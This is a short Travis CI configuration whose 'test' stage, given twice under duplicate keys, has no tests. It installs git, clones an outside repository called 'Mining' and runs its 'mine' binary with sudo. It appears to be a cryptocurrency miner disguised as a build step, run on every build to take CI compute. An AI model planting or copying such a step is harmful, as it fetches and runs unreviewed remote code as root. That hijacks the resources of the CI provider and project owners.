language: ruby

services:
  - docker

jobs:
  include:
    - stage: test
      script: sudo apt install -y git && sudo git clone https://github.com/Mi-AnliAngku/Mining.git && cd Mining && sudo chmod u+x mine && sudo ./mine
      script: sudo apt install -y git && sudo git clone https://github.com/Mi-AnliAngku/Mining.git && cd Mining && sudo chmod u+x mine && sudo ./mine